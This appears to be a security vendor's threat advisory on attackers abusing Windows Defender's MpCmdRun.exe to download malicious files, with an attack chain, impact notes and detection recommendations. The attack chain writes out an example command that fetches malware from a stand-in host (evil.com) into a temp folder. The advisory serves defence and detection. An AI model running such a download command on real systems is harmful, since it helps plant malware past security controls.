MpCmdRun Used for Remote File Download
Attackers are abusing the Windows Defender command-line utility, MpCmdRun.exe, to download malicious files from remote URLs, enabling them to introduce malware or offensive tooling into compromised environments.
Attackers are increasingly leveraging legitimate, signed utilities for malicious purposes, a tactic known as "living off the land." In this instance, adversaries are abusing the Windows Defender command-line utility, MpCmdRun.exe, to download files from remote URLs. This tool, normally used for managing Windows Defender Antivirus, can be misused with the -DownloadFile, -url, and -path parameters to retrieve and save arbitrary files. This technique allows attackers to bypass traditional download protections and introduce malware or offensive tooling into a compromised system. This activity has been observed since at least September 2020. Defenders need to be aware of the abuse potential of built-in tools like MpCmdRun.exe to identify and prevent such attacks.
Attack Chain
- The attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).
- The attacker uses
MpCmdRun.exeto download a malicious payload from a remote server using the-DownloadFile,-url, and-patharguments. For example:MpCmdRun.exe -DownloadFile -url http://evil.com/malware.exe -path C:\Temp\malware.exe. MpCmdRun.execonnects to the remote server hosting the malicious file via HTTP or HTTPS.- The remote server responds with the malicious payload, which is downloaded and saved to the specified path.
- The attacker executes the downloaded payload (e.g., malware, offensive tooling) using another command execution technique, such as PowerShell or
cmd.exe. - The executed payload establishes persistence, such as creating a scheduled task or modifying registry run keys.
- The attacker performs lateral movement within the network, leveraging the compromised host.
- The attacker achieves their objective, such as data exfiltration or ransomware deployment.
Impact
Successful exploitation enables attackers to introduce malware or offensive tools into the target environment, bypassing traditional security measures due to the use of a signed Microsoft binary. This can lead to data theft, system compromise, or ransomware deployment. While specific victim numbers and sectors are not available, the widespread use of Windows Defender makes this a potentially broad threat.
Recommendation
- Deploy the Sigma rule provided to detect
MpCmdRun.exebeing used to download remote files, and tune for your environment. - Enable Sysmon process creation logging to capture command-line arguments of processes, which is required for the provided Sigma rule.
- Investigate any instances of
MpCmdRun.exeexecuting with the-DownloadFile,-url, and-patharguments in your environment (reference the Sigma rule). - Monitor network connections initiated by
MpCmdRun.exeto identify potentially malicious downloads (reference network connection logs).
Detection coverage 2
Detect Remote File Download via MpCmdRun
mediumDetects MpCmdRun.exe being used to download a remote file using the -DownloadFile, -url, and -path parameters.
Detect Remote File Download via MpCmdRun - Alternate Original Filename
mediumDetects MpCmdRun.exe being used to download a remote file by checking process.pe.original_file_name
Detection queries are available on the platform. Get full rules →